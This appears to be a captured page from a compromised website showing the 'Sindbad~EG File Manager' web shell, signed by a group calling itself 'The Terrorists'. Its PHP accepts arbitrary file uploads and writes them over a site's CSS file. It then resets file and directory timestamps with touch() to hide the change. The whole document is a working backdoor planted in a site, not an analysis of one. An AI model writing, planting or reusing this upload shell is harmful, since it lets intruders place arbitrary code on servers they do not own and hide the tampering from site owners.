Sindbad~EG File Manager
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$fp = "/home/admin/ricard.blog.lppelm.o2switch.site/"; $fn = "ricard.blog.lppelm.o2switch.site.css"; @chdir($fp); $tm = @filemtime($fp); print("\n<br>");if(@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { if($tm) { @touch($fn,$tm,$tm); @touch($fp,$tm,$tm); } print("<file>$fn</file><size>" . filesize($fn) . "</size><writable>" . is_writable($fn) . "</writable><date>" . @date("Y-m-d H:i:s", @filemtime($fn)) . "</date>"); }echo "Result:OK"; echo "</body></html>"; die;
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists